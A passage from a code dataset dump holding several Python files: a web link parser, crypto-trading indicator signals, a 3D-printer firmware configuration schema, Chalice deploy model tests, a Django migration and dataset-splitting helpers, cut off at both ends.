True:\n\ttry:\n\t\tget_response()\n\texcept:\n\t\tspk.speak(\"I can not understand what you are saying...\")","sub_path":"Vision/bin/search_file.py","file_name":"search_file.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"482456827","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlparse\nfrom logs import Logger\n\n\nclass Parse_Link(object):\n \"\"\"\n Главное действующее лицо в этой пьесе\n - создает список\n - парсит страницу\n * находит все бъекты \n * забирает href\n * если в списке нет этой ссылки\n и эта ссылка не ведет в соцсети\n и не наружняя ссылка\n и не текстовый якорь:\n убирает параметры после ?\n убирает домен\n добавляет ее\n - и записывает все ссылки в файл\n чтобы генератор дерева My_Tree() мог их прочесть\n \"\"\"\n def __init__(self, url):\n self.url = url\n self.list_links = []\n self.filename = 'parsed_links.txt'\n self.social = ['vk', 'facebook', 'linkedin', 'twitter', 'callto', 'skype', 'tel', '#']\n\n def make_links(self):\n log = Logger(onprint=False)\n\n log.debug(f'start urlopen {self.url}')\n \n page = urlopen(self.url)\n hostname = urlparse(self.url).hostname\n\n log.info(f'start soup {self.url}')\n soup = BeautifulSoup(page, 'html.parser')\n\n # поиск ссылок\n all_links = soup.find_all('a')\n\n for link in all_links:\n # забирает href\n l = link.get('href')\n\n if l:\n # убираю аргументы из ссылок\n if '?' in l:\n l = l[:l.find('?')]\n\n if hostname in l:\n # отделить домен\n l = l.split(hostname)\n l = l[-1]\n\n for s in self.social:\n # удалить ссылки на соцсеточки\n if s in l :\n l = 'zero'\n\n # Проверяет внутренняя ли это ссылка\n if l.startswith('http') and hostname not in l:\n l = 'zero'\n \n # сохраняю в список\n if l not in self.list_links and l != 'zero' and len(l) > 1:\n self.list_links.append(l)\n\n log.info(f'finish make_links in {self.url}')\n\n def write_to_file(self):\n # запись в файл\n with open(self.filename, 'w') as f:\n for link in self.list_links:\n f.write(f\"{link}\\n\")\n","sub_path":"parse_link.py","file_name":"parse_link.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"435878643","text":"import asyncio\nimport os\nfrom datetime import datetime\n\nimport pandas as pd\nimport pandas_ta as ta\nimport numpy as np\nimport scipy.signal\nfrom trader import Trader\nfrom coin_data import CoinData\n\nclient = Trader().client\nfile_path = os.path.abspath(os.path.dirname(__file__))\nos.chdir(file_path)\n\n\nclass Signals:\n\n def __init__(self, symbol, tf):\n\n \"\"\"Check for signals for given symbol and timeframe\"\"\"\n\n self.symbol = symbol.upper()\n self.tf = tf\n self.df = CoinData.get_dataframe(symbol, tf)\n self.df = self.df_ta()\n # self.df = self.get_heiken_ashi()\n # self.vol_signal = self.vol_rise_fall()\n # self.vol_candle = self.large_vol_candle()\n # self.HA_trend = self.get_heiken_ashi_trend(self.get_heiken_ashi(self.df))\n self.rsi_ob_os_dict = {\n 'overbought': False,\n 'oversold': False,\n }\n\n self.rsi_div_dict = {\n 'possible bearish divergence': False,\n 'possible bullish divergence': False,\n 'confirmed bearish divergence': False,\n 'confirmed bullish divergence': False,\n }\n\n self.macd_dict = {\n 'MACD cross': None,\n 'MACD 0 cross': None,\n }\n\n self.ema_signals_dict = {\n 'Price crossing EMA200': None,\n 'EMA20 crossing EMA50': None,\n 'EMA50 crossing EMA200': None,\n }\n\n async def _async_init(self):\n task_0 = asyncio.create_task(self.rsi_overbought_oversold())\n task_1 = asyncio.create_task(self.rsi_divergence())\n task_2 = asyncio.create_task(self.macd_signals())\n task_3 = asyncio.create_task(self.ema_signals())\n await task_0\n await task_1\n await task_2\n await task_3\n\n def full_check(self):\n self.rsi_divergence()\n self.ema_signals()\n self.macd_signals()\n self.rsi_overbought_oversold()\n # self.vol_rise_fall()\n # self.large_vol_candle()\n\n def df_ta(self) -> pd.DataFrame:\n df = self.df\n df['rsi'] = ta.rsi(df.close, 14)\n df = pd.concat((df, ta.macd(df.close, 12, 26, 9)), axis=1)\n df['ema_20'], df['ema_50'] = ta.ema(df.close, 20), ta.ema(df.close, 50)\n if len(df) >= 288:\n df['ema_200'] = ta.ema(df.close, 200)\n else:\n df['ema_200'] = ta.ema(df.close, len(df.close) - 3)\n df = df.tail(88)\n return df\n\n @staticmethod\n def get_heiken_ashi(df):\n df['HA_Close'] = (df['open'] + df['high'] + df['low'] + df['close']) / 4\n idx = df.index.name\n df.reset_index(inplace=True)\n\n for i in range(0, len(df)):\n if i == 0:\n df.at[i, 'HA_Open'] = ((df._get_value(i, 'open') + df._get_value(i, 'close')) / 2)\n else:\n df.at[i, 'HA_Open'] = ((df._get_value(i - 1, 'HA_Open') + df._get_value(i - 1, 'HA_Close')) / 2)\n\n if idx:\n df.set_index(idx, inplace=True)\n\n df['HA_High'] = df[['HA_Open', 'HA_Close', 'high']].max(axis=1)\n df['HA_Low'] = df[['HA_Open', 'HA_Close', 'low']].min(axis=1)\n\n return df\n\n @staticmethod\n def get_heiken_ashi_trend(df):\n if df['HA_Close'].iloc[-1] > df['HA_Open'].iloc[-1]:\n if df['HA_Close'].iloc[-2] > df['HA_Open'].iloc[-2]:\n return True\n elif df['HA_Close'].iloc[-1] < df['HA_Open'].iloc[-1]:\n if df['HA_Close'].iloc[-2] < df['HA_Open'].iloc[-2]:\n return False\n else:\n return None\n\n def rsi_divergence(self):\n rsi_array = np.array(self.df['rsi'].tail(20).array)\n close_array = np.array(self.df['close'].tail(20).array)\n rsi_peaks, _ = scipy.signal.find_peaks(rsi_array)\n rsi_troughs, _ = scipy.signal.find_peaks(-rsi_array)\n original_index = len(close_array)\n indices = np.array([])\n\n # bearish divergence confirmed: rsi formed lower peak while price formed higher peak\n if 70 <= rsi_array[rsi_peaks[-2]] >= rsi_array[rsi_peaks[-1]] >= rsi_array[-2] >= rsi_array[-1]:\n if close_array[rsi_peaks[-2]] <= close_array[rsi_peaks[-1]]:\n close_array = np.array([close_array[rsi_peaks[-2]], close_array[rsi_peaks[-1]]])\n rsi_array = np.array([rsi_array[rsi_peaks[-2]], rsi_array[rsi_peaks[-1]]])\n indices = np.array([rsi_peaks[-2], rsi_peaks[-1]])\n self.rsi_div_dict['confirmed bearish divergence'] = True\n\n # possible bearish divergence: rsi forming lower peak while price forming higher peak\n elif 70 <= rsi_array[rsi_peaks[-1]] >= rsi_array[-2] > rsi_array[-1]:\n if close_array[rsi_peaks[-1]] <= close_array[-1]:\n close_array = np.array([close_array[rsi_peaks[-1]], close_array[-1]])\n rsi_array = np.array([rsi_array[rsi_peaks[-1]], rsi_array[-1]])\n indices = np.array([rsi_peaks[-1], original_index])\n self.rsi_div_dict['possible bearish divergence'] = True\n\n # bullish divergence confirmed: rsi formed higher trough while price formed lower trough\n elif 30 >= rsi_array[rsi_troughs[-2]] <= rsi_array[rsi_troughs[-1]] <= rsi_array[-2] <= rsi_array[-1]:\n if close_array[rsi_troughs[-2]] >= close_array[rsi_troughs[-1]]:\n close_array = np.array([close_array[rsi_troughs[-2]], close_array[rsi_troughs[-1]]])\n rsi_array = np.array([rsi_array[rsi_troughs[-2]], rsi_array[rsi_troughs[-1]]])\n indices = np.array([rsi_troughs[-2], rsi_troughs[-1]])\n self.rsi_div_dict['confirmed bullish divergence'] = True\n\n # possible bullish divergence: rsi forming higher trough while price forming lower trough\n elif 30 >= rsi_array[rsi_troughs[-1]] <= rsi_array[-2] < rsi_array[-1]:\n if close_array[rsi_troughs[-1]] >= close_array[-1]:\n close_array = np.array([close_array[rsi_troughs[-1]], close_array[-1]])\n rsi_array = np.array([rsi_array[rsi_troughs[-1]], rsi_array[-1]])\n indices = np.array([rsi_troughs[-1], original_index])\n self.rsi_div_dict['possible bullish divergence'] = True\n\n return self.rsi_div_dict, close_array, rsi_array, indices\n\n def rsi_overbought_oversold(self, o_s=30, o_b=70):\n rsi_array = self.df['rsi'].array\n if rsi_array[-3] <= o_s <= rsi_array[-2]:\n self.rsi_ob_os_dict['oversold'] = True\n elif rsi_array[-3] >= o_b >= rsi_array[-2]:\n self.rsi_ob_os_dict['overbought'] = True\n return self.rsi_ob_os_dict\n\n def macd_signals(self):\n if self.df['MACD_12_26_9'].array[-2] > self.df['MACDs_12_26_9'].array[-2]:\n if self.df['MACD_12_26_9'].array[-3] < self.df['MACDs_12_26_9'].array[-3]:\n self.macd_dict['MACD cross'] = True\n elif self.df['MACD_12_26_9'].array[-2] < self.df['MACDs_12_26_9'].array[-2]:\n if self.df['MACD_12_26_9'].array[-3] > self.df['MACDs_12_26_9'].array[-3]:\n self.macd_dict['MACD cross'] = False\n if (self.df['MACD_12_26_9'].array[-2], self.df['MACDs_12_26_9'].array[-2]) > (0, 0):\n if (self.df['MACD_12_26_9'].array[-3], self.df['MACDs_12_26_9'].array[-3]) <= (0, 0):\n self.macd_dict['MACD 0 cross'] = True\n elif (self.df['MACD_12_26_9'].array[-2], self.df['MACDs_12_26_9'].array[-2]) < (0, 0):\n if (self.df['MACD_12_26_9'].array[-3], self.df['MACDs_12_26_9'].array[-3]) >= (0, 0):\n self.macd_dict['MACD 0 cross'] = False\n\n def ema_signals(self):\n ema_200 = self.df['ema_200'].array[-3:]\n ema_50 = self.df['ema_50'].array[-3:]\n ema_20 = self.df['ema_20'].array[-3:]\n price = self.df['close'].array[-3:]\n if ema_200[0] > price[0] and ema_200[1] >= price[1] and ema_200[2] < price[2]:\n self.ema_signals_dict['Price crossing EMA200'] = True\n elif ema_200[0] < price[0] and ema_200[1] <= price[1] and ema_200[2] > price[2]:\n self.ema_signals_dict['Price crossing EMA200'] = False\n if ema_20[0] > ema_50[0] and ema_20[1] >= ema_50[1] and ema_20[2] < ema_50[2]:\n self.ema_signals_dict['EMA20 crossing EMA50'] = False\n elif ema_20[0] < ema_50[0] and ema_20[1] <= ema_50[1] and ema_20[2] > ema_50[2]:\n self.ema_signals_dict['EMA20 crossing EMA50'] = True\n if ema_50[0] > ema_200[0] and ema_50[1] >= ema_200[1] and ema_50[2] < ema_200[2]:\n self.ema_signals_dict['EMA50 crossing EMA200'] = False\n elif ema_50[0] < ema_200[0] and ema_50[1] <= ema_200[1] and ema_50[2] > ema_200[2]:\n self.ema_signals_dict['EMA50 crossing EMA200'] = True\n return self.ema_signals_dict\n\n # def vol_rise_fall(self):\n # recent_vol = self.df.volume.tail(3).array\n # self.vol_signal = True if recent_vol[0] < recent_vol[1] < recent_vol[2] else False\n # return self.vol_signal\n #\n # def large_vol_candle(self):\n # self.vol_candle = True if self.df.volume.array[-1] >= self.df.volume.tail(14).values.mean()*2 else False\n # return self.vol_candle\n\n\nasync def create_signals_instance(symbol='BTCUSDT', tf='15m'):\n s = Signals(symbol, tf)\n await s._async_init()\n return s\n\n\nif __name__ == '__main__':\n x = datetime.now()\n df = CoinData.get_dataframe('BTCUSDT', '15m')\n print(Signals.get_heiken_ashi(df))\n print(datetime.now() - x)","sub_path":"async_signals.py","file_name":"async_signals.py","file_ext":"py","file_size_in_byte":9467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"583099171","text":"import configema as ce\n\ndef simple_list(elem_title, value_title, **kwargs):\n return ce.Array(table=True, elem=ce.Compound('elem', title=elem_title, attrs=[\n ce.String(key='value', title=value_title)\n ]), **kwargs)\n\ndef interrupt_timer_choice(**kwargs):\n return ce.Compound('interrupt_timer', ident='id_interrupt_timer_choice', collapsed=True, attrs=[\n ce.Reference(key='oc_unit', ref_array='id_board.platform', ref_array_descend=['clock', 'avail_oc_units'], ref_id_key='value', ref_name_key='value', title='Output compare unit', deref_key='lalal')\n ], **kwargs)\n\ndef pin_choice(**kwargs):\n return ce.String(**kwargs)\n\ndef digital_input_choice(**kwargs):\n return ce.Reference(ref_array='id_configuration.board_data', ref_array_descend=['digital_inputs'], ref_id_key='Name', ref_name_key='Name', **kwargs)\n\ndef analog_input_choice(**kwargs):\n return ce.Reference(ref_array='id_configuration.board_data', ref_array_descend=['analog_inputs'], ref_id_key='Name', ref_name_key='Name', **kwargs)\n\ndef pwm_output_choice(**kwargs):\n return ce.Reference(ref_array='id_configuration.board_data', ref_array_descend=['pwm_outputs'], ref_id_key='Name', ref_name_key='Name', **kwargs)\n\ndef i2c_choice(**kwargs):\n return ce.OneOf(disable_collapse=True, choices=[\n ce.Compound('At91SamI2c', attrs=[\n ce.String(key='Device'),\n ce.Integer(key='Ckdiv'),\n ce.Float(key='I2cFreq')\n ])\n ], **kwargs)\n\ndef spi_choice(**kwargs):\n return ce.OneOf(disable_collapse=True, choices=[\n ce.Compound('At91SamSpi', attrs=[\n ce.String(key='Device')\n ])\n ], **kwargs)\n\ndef at91sam3x_clock():\n return ce.Compound('At91Sam3xClock', key='clock', title='Clock', collapsed=True, attrs=[\n ce.Integer(key='prescaler', title='Prescaler'),\n ce.String(key='primary_timer', title='Primary timer'),\n ce.Constant(key='avail_oc_units', value=[\n {\n 'value': 'TC{}{}'.format(n, l)\n } for n in range(9) for l in ('A', 'B', 'C')\n ])\n ])\n\ndef at91sam_adc():\n return ce.Compound('At91SamAdc', key='adc', title='ADC', collapsed=True, attrs=[\n ce.Float(key='freq', title='Frequency'),\n ce.Float(key='avg_interval', title='Averaging interval'),\n ce.Float(key='smoothing', title='Smoothing factor'),\n ce.Integer(key='startup', title='Startup time'),\n ce.Integer(key='settling', title='Settling time'),\n ce.Integer(key='tracking', title='Tracking time'),\n ce.Integer(key='transfer', title='Transfer time')\n ])\n\ndef at91sam_watchdog():\n return ce.Compound('At91SamWatchdog', key='watchdog', title='Watchdog', collapsed=True, attrs=[\n ce.Integer(key='Wdv', title='Wdv')\n ])\n\ndef at91sam_pins():\n return ce.Compound('At91SamPins', key='pins', title='Pins', collapsed=True, attrs=[\n ce.Constant(key='input_modes', value=[\n { 'ident': 'At91SamPinInputModeNormal', 'name': 'Normal' },\n { 'ident': 'At91SamPinInputModePullUp', 'name': 'Pull-up' }\n ])\n ])\n\ndef editor():\n return ce.Compound('editor', title='Configuration editor', disable_collapse=True, no_header=True, attrs=[\n ce.Constant(key='version', value=1),\n ce.Array(key='configurations', title='Configurations', elem=ce.Compound('config', key='config', ident='id_configuration', title='Configuration', title_key='name', collapsed=True, attrs=[\n ce.String(key='name', title='Name'),\n ce.Reference(key='board_id', ref_array='boards', ref_id_key='identifier', ref_name_key='name', deref_key='board_data', title='Board'),\n ce.Float(key='InactiveTime', title='Inactive time'),\n ce.Compound('advanced', key='advanced', title='Advanced parameters', collapsed=True, attrs=[\n ce.Float(key='LedBlinkInterval', title='LED blink interval'),\n ce.Float(key='ForceTimeout', title='Force timeout'),\n ]),\n ce.Array(key='steppers', title='Steppers', disable_collapse=True, elem=ce.Compound('stepper', title='Stepper', title_key='Name', collapsed=True, ident='id_configuration_stepper', attrs=[\n ce.String(key='Name', title='Name'),\n ce.Reference(key='stepper_port', title='Stepper port', ref_array='id_configuration.board_data', ref_array_descend=['stepper_ports'], ref_id_key='Name', ref_name_key='Name'),\n ce.Boolean(key='InvertDir', title='Invert direction'),\n ce.Float(key='StepsPerUnit', title='Steps per unit'),\n ce.Float(key='MinPos', title='Minimum position'),\n ce.Float(key='MaxPos', title='Maximum position'),\n ce.Float(key='MaxSpeed', title='Maximum speed'),\n ce.Float(key='MaxAccel', title='Maximum acceleration'),\n ce.Float(key='DistanceFactor', title='Distance factor'),\n ce.Float(key='CorneringDistance', title='Cornering distance'),\n ce.Boolean(key='EnableCartesianSpeedLimit', title='Is cartesian'),\n ce.OneOf(key='homing', title='Homing', collapsed=True, choices=[\n ce.Compound('no_homing', title='Disabled', attrs=[]),\n ce.Compound('homing', title='Enabled', ident='id_board_steppers_homing', attrs=[\n ce.Boolean(key='HomeDir', title='Homing direction', false_title='Negative', true_title='Positive'),\n digital_input_choice(key='HomeEndstopInput', title='Endstop digital input'),\n ce.Boolean(key='HomeEndInvert', title='Invert endstop'),\n ce.Float(key='HomeFastMaxDist', title='Maximum fast (initial) travel'),\n ce.Float(key='HomeRetractDist', title='Retraction travel'),\n ce.Float(key='HomeSlowMaxDist', title='Maximum slow (after retraction) travel'),\n ce.Float(key='HomeFastSpeed', title='Fast speed'),\n ce.Float(key='HomeRetractSpeed', title='Retraction speed'),\n ce.Float(key='HomeSlowSpeed', title='Slow speed')\n ])\n ])\n ])),\n ce.Array(key='heaters', title='Heaters', disable_collapse=True, elem=ce.Compound('heater', title='Heater', title_key='Name', collapsed=True, ident='id_configuration_heater', attrs=[\n ce.String(key='Name', title='Name'),\n pwm_output_choice(key='pwm_output', title='PWM output'),\n ce.Integer(key='SetMCommand', title='Set command M-number'),\n ce.Integer(key='WaitMCommand', title='Wait command M-number'),\n analog_input_choice(key='ThermistorInput', title='Thermistor analog input'),\n ce.Float(key='MinSafeTemp', title='Minimum safe temperature [C]'),\n ce.Float(key='MaxSafeTemp', title='Maximum safe temperature [C]'),\n ce.Compound('conversion', key='conversion', title='Conversion parameters', collapsed=True, attrs=[\n ce.Float(key='ResistorR', title='Resistor resistance [ohm]'),\n ce.Float(key='R0', title='Thermistor resistance @25C [ohm]'),\n ce.Float(key='Beta', title='Thermistor beta value [K]'),\n ce.Float(key='MinTemp', title='Minimum temperature [C]'),\n ce.Float(key='MaxTemp', title='Maximum temperature [C]')\n ]),\n ce.Compound('control', key='control', title='Control parameters', collapsed=True, attrs=[\n ce.Float(key='ControlInterval', title='Control interval [s]'),\n ce.Float(key='PidP', title='PID proportional factor [1/K]'),\n ce.Float(key='PidI', title='PID integral factor [1/(Ks)]'),\n ce.Float(key='PidD', title='PID derivative factor [s/K]'),\n ce.Float(key='PidIStateMin', title='PID integral state min [1]'),\n ce.Float(key='PidIStateMax', title='PID integral state max [1]'),\n ce.Float(key='PidDHistory', title='PID derivative smoothing factor [1]')\n ]),\n ce.Compound('observer', key='observer', title='Observation parameters', collapsed=True, attrs=[\n ce.Float(key='ObserverInterval', title='Observation interval [s]'),\n ce.Float(key='ObserverTolerance', title='Observation tolerance [K]'),\n ce.Float(key='ObserverMinTime', title='Observation minimum time [s]')\n ])\n ])),\n ce.Array(key='fans', title='Fans', disable_collapse=True, elem=ce.Compound('fan', title='Fan', title_key='Name', collapsed=True, ident='id_configuration_fan', attrs=[\n ce.String(key='Name', title='Name'),\n pwm_output_choice(key='pwm_output', title='PWM output'),\n ce.Integer(key='SetMCommand', title='Set command M-number'),\n ce.Integer(key='OffMCommand', title='Off command M-number'),\n ])),\n ce.OneOf(key='probe', title='Bed probing', collapsed=True, choices=[\n ce.Compound('NoProbe', title='Disabled', attrs=[]),\n ce.Compound('Probe', title='Enabled', ident='id_configuration_probe_probe', attrs=[\n digital_input_choice(key='ProbePin', title='Probe pin'),\n ce.Boolean(key='InvertInput', title='Invert input'),\n ce.Float(key='OffsetX', title='Probe offset (X)'),\n ce.Float(key='OffsetY', title='Probe offset (Y)'),\n ce.Float(key='StartHeight', title='Starting Z for probing a point'),\n ce.Float(key='LowHeight', title='Minimum Z to move down to'),\n ce.Float(key='RetractDist', title='Retraction distance'),\n ce.Float(key='MoveSpeed', title='Speed for moving to probe points'),\n ce.Float(key='FastSpeed', title='Fast (first) probing speed'),\n ce.Float(key='RetractSpeed', title='Retraction speed'),\n ce.Float(key='SlowSpeed', title='Slow (second) probing speed'),\n ce.Array(key='ProbePoints', title='Probe points', elem=ce.Compound('ProbePoint', title='Probe point', attrs=[\n ce.Float(key='X'),\n ce.Float(key='Y')\n ]))\n ])\n ])\n ])),\n ce.Array(key='boards', title='Boards', elem=ce.Compound('board', title='Board', title_key='name', collapsed=True, ident='id_board', attrs=[\n ce.String(key='identifier', title='Identifier'),\n ce.String(key='name', title='Name'),\n ce.String(key='board_for_build', title='Board for building (see nix/boards.nix)'),\n pin_choice(key='LedPin', title='LED pin'),\n ce.OneOf(key='config_manager', title='Runtime configuration', collapsed=True, choices=[\n ce.Compound('ConstantConfigManager', title='Disabled', attrs=[]),\n ce.Compound('RuntimeConfigManager', title='Enabled', attrs=[\n ce.OneOf(key='ConfigStore', title='Configuration storage', disable_collapse=True, choices=[\n ce.Compound('NoStore', title='None', attrs=[]),\n ce.Compound('EepromConfigStore', attrs=[\n ce.OneOf(key='Eeprom', title='EEPROM backend', disable_collapse=True, choices=[\n ce.Compound('I2cEeprom', attrs=[\n i2c_choice(key='I2c', title='I2C backend'),\n ce.Integer(key='I2cAddr'),\n ce.Integer(key='Size'),\n ce.Integer(key='BlockSize'),\n ce.Float(key='WriteTimeout')\n ])\n ]),\n ce.Integer(key='StartBlock'),\n ce.Integer(key='EndBlock'),\n ])\n ])\n ]),\n ]),\n ce.Compound('serial', key='serial', title='Serial parameters', collapsed=True, attrs=[\n ce.Integer(key='BaudRate', title='Baud rate'),\n ce.Integer(key='RecvBufferSizeExp', title='Receive buffer size (power of two exponent)'),\n ce.Integer(key='SendBufferSizeExp', title='Send buffer size (power of two exponent)'),\n ce.Integer(key='GcodeMaxParts', title='Max parts in GCode command'),\n ce.OneOf(key='Service', title='Backend', disable_collapse=True, choices=[\n ce.Compound('AsfUsbSerial', title='AT91 USB', attrs=[]),\n ce.Compound('At91Sam3xSerial', title='AT91 UART', attrs=[])\n ])\n ]),\n ce.OneOf(key='sdcard', title='SD card', collapsed=True, choices=[\n ce.Compound('NoSdCard', title='Disabled', attrs=[]),\n ce.Compound('SdCard', title='Enabled', attrs=[\n ce.Integer(key='BufferBaseSize', title='Buffer size'),\n ce.Integer(key='MaxCommandSize', title='Maximum command size'),\n ce.OneOf(key='GcodeParser', title='G-code parser', choices=[\n ce.Compound('TextGcodeParser', title='Text G-code parser', attrs=[\n ce.Integer(key='MaxParts', title='Maximum number of command parts')\n ]),\n ce.Compound('BinaryGcodeParser', title='Binary G-code parser', attrs=[\n ce.Integer(key='MaxParts', title='Maximum number of command parts')\n ])\n ]),\n ce.OneOf(key='SdCardService', title='Driver', collapsed=True, choices=[\n ce.Compound('SpiSdCard', title='SPI', attrs=[\n pin_choice(key='SsPin', title='SS pin'),\n spi_choice(key='SpiService', title='SPI driver')\n ])\n ])\n ])\n ]),\n ce.Compound('performance', key='performance', title='Performance parameters', collapsed=True, attrs=[\n ce.Float(key='MaxStepsPerCycle', title='Max steps per cycle'),\n ce.Integer(key='StepperSegmentBufferSize', title='Stepper segment buffer size'),\n ce.Integer(key='EventChannelBufferSize', title='Event channel buffer size'),\n ce.Integer(key='LookaheadBufferSize', title='Lookahead buffer size'),\n ce.Integer(key='LookaheadCommitCount', title='Lookahead commit count'),\n ce.String(key='FpType', enum=['float', 'double']),\n ce.String(key='AxisDriverPrecisionParams', title='Stepping precision parameters', enum=['AxisDriverAvrPrecisionParams', 'AxisDriverDuePrecisionParams']),\n ce.Float(key='EventChannelTimerClearance', title='Event channel timer clearance')\n ]),\n interrupt_timer_choice(key='EventChannelTimer', title='Event channel timer'),\n ce.Array(key='stepper_ports', title='Stepper ports', disable_collapse=True, elem=ce.Compound('stepper_port', title='Stepper port', title_key='Name', collapsed=True, attrs=[\n ce.String(key='Name', title='Name'),\n pin_choice(key='DirPin', title='Direction pin'),\n pin_choice(key='StepPin', title='Step pin'),\n pin_choice(key='EnablePin', title='Enable pin'),\n interrupt_timer_choice(key='StepperTimer', title='Stepper timer'),\n ])),\n ce.Array(key='digital_inputs', title='Digital inputs', disable_collapse=True, elem=ce.Compound('digital_input', title='Digital input', title_key='Name', collapsed=True, ident='id_board_digital_inputs', attrs=[\n ce.String(key='Name', title='Name'),\n pin_choice(key='Pin', title='Pin'),\n ce.Reference(key='InputMode', title='Input mode', ref_array='id_board.platform', ref_array_descend=['pins', 'input_modes'], ref_id_key='ident', ref_name_key='name')\n ])),\n ce.Array(key='analog_inputs', title='Analog inputs', disable_collapse=True, elem=ce.Compound('analog_input', title='Analog input', title_key='Name', collapsed=True, attrs=[\n ce.String(key='Name', title='Name'),\n pin_choice(key='Pin', title='Pin'),\n ])),\n ce.Array(key='pwm_outputs', title='PWM outputs', disable_collapse=True, elem=ce.Compound('pwm_output', title='PWM output', title_key='Name', collapsed=True, attrs=[\n ce.String(key='Name', title='Name'),\n ce.OneOf(key='Backend', title='Backend', disable_collapse=True, choices=[\n ce.Compound('SoftPwm', attrs=[\n pin_choice(key='OutputPin', title='Output pin'),\n ce.Boolean(key='OutputInvert', title='Output logic', false_title='Normal (On=High)', true_title='Inverted (On=Low)'),\n ce.Float(key='PulseInterval', title='PWM pulse duration'),\n interrupt_timer_choice(key='Timer', title='Soft PWM Timer')\n ])\n ])\n ])),\n ce.OneOf(key='platform', title='Platform', disable_collapse=True, choices=[\n ce.Compound('At91Sam3x8e', attrs=[\n at91sam3x_clock(),\n at91sam_adc(),\n at91sam_watchdog(),\n at91sam_pins()\n ])\n ]),\n ce.Array(key='board_helper_includes', title='Board helper includes', disable_collapse=True, table=True, elem=ce.String(title='Name')),\n ]))\n ])\n","sub_path":"config_gui/aprinter_config_editor.py","file_name":"aprinter_config_editor.py","file_ext":"py","file_size_in_byte":17877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"387678577","text":"from pytest import fixture\nfrom attr import evolve\n\nfrom chalice.deploy import models\n\n\n@fixture\ndef lambda_function():\n return models.LambdaFunction(\n resource_name='foo',\n function_name='app-stage-foo',\n deployment_package=None,\n environment_variables={},\n runtime='python2.7',\n handler='app.app',\n tags={},\n timeout=None,\n memory_size=None,\n role=models.PreCreatedIAMRole(role_arn='foobar'),\n security_group_ids=[],\n subnet_ids=[],\n layers=[],\n reserved_concurrency=None,\n )\n\n\ndef test_can_instantiate_empty_application():\n app = models.Application(stage='dev', resources=[])\n assert app.dependencies() == []\n\n\ndef test_can_instantiate_app_with_deps():\n role = models.PreCreatedIAMRole(role_arn='foo')\n app = models.Application(stage='dev', resources=[role])\n assert app.dependencies() == [role]\n\n\ndef test_can_default_to_no_auths_in_rest_api(lambda_function):\n rest_api = models.RestAPI(\n resource_name='rest_api',\n swagger_doc={'swagger': '2.0'},\n minimum_compression='',\n api_gateway_stage='api',\n lambda_function=lambda_function,\n )\n assert rest_api.dependencies() == [lambda_function]\n\n\ndef test_can_add_authorizers_to_dependencies(lambda_function):\n auth1 = evolve(lambda_function, resource_name='auth1')\n auth2 = evolve(lambda_function, resource_name='auth2')\n rest_api = models.RestAPI(\n resource_name='rest_api',\n swagger_doc={'swagger': '2.0'},\n minimum_compression='',\n api_gateway_stage='api',\n lambda_function=lambda_function,\n authorizers=[auth1, auth2],\n )\n assert rest_api.dependencies() == [lambda_function, auth1, auth2]\n","sub_path":"misc/aws-hello-world/lib/python3.7/site-packages/tests/unit/deploy/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"127044473","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('projects', '0002_auto_20140903_0920'),\n ('contenttypes', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Reference',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('object_id', models.PositiveIntegerField()),\n ('ref', models.BigIntegerField()),\n ('created_at', models.DateTimeField(default=django.utils.timezone.now)),\n ('content_type', models.ForeignKey(related_name='+', to='contenttypes.ContentType')),\n ('project', models.ForeignKey(related_name='references', to='projects.Project')),\n ],\n options={\n 'ordering': ['created_at'],\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='reference',\n unique_together=set([('project', 'ref')]),\n ),\n ]\n","sub_path":"taiga/projects/references/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"523779381","text":"import glob as _glob\nimport json as _json\nimport os as _os\nimport random as _rd\n\nimport numpy as _np\n\n_sep = _os.sep\n\n\ndef create_ratio_split(files, save_to_dir=None, ratio: list = None, first_key='train', name='SPLIT',\n shuffle_files=True):\n if shuffle_files:\n _rd.shuffle(files)\n\n keys = [first_key]\n if len(ratio) == 2:\n keys.append('test')\n elif len(ratio) == 3:\n keys.append('validation')\n keys.append('test')\n\n _ratio = ratio[::-1]\n locs = _np.array([sum(_ratio[0:i + 1]) for i in range(len(ratio) - 1)])\n locs = (locs * len(files)).astype(int)\n splits = _np.split(files[::-1], locs)[::-1]\n splits = dict([(k, sp.tolist()[::-1]) for k, sp in zip(keys, splits)])\n if save_to_dir:\n f = open(save_to_dir + _sep + f'{name}.json', \"w\")\n f.write(_json.dumps(splits))\n f.close()\n else:\n return splits\n\n\ndef create_k_fold_splits(files, k=0, save_to_dir=None, shuffle_files=True, name='SPLIT'):\n if shuffle_files:\n _rd.shuffle(files)\n\n ix_splits = _np.array_split(_np.arange(len(files)), k)\n for i in range(len(ix_splits)):\n test_ix = ix_splits[i].tolist()\n val_ix = ix_splits[(i + 1) % len(ix_splits)].tolist()\n train_ix = [ix for ix in _np.arange(len(files)) if ix not in test_ix + val_ix]\n\n splits = {'train': [files[ix] for ix in train_ix],\n 'validation': [files[ix] for ix in val_ix],\n 'test': [files[ix] for ix in test_ix]}\n\n if save_to_dir:\n f = open(save_to_dir + _sep + f\"{name}_{i}.json\", \"w\")\n f.write(_json.dumps(splits))\n f.close()\n else:\n return splits\n\n\ndef uniform_mix_two_lists(smaller, larger, shuffle=True):\n if shuffle:\n _rd.shuffle(smaller)\n _rd.shuffle(larger)\n\n len_smaller, len_larger = len(smaller), len(larger)\n\n accumulator = []\n while len(accumulator) < len_smaller + len_larger:\n 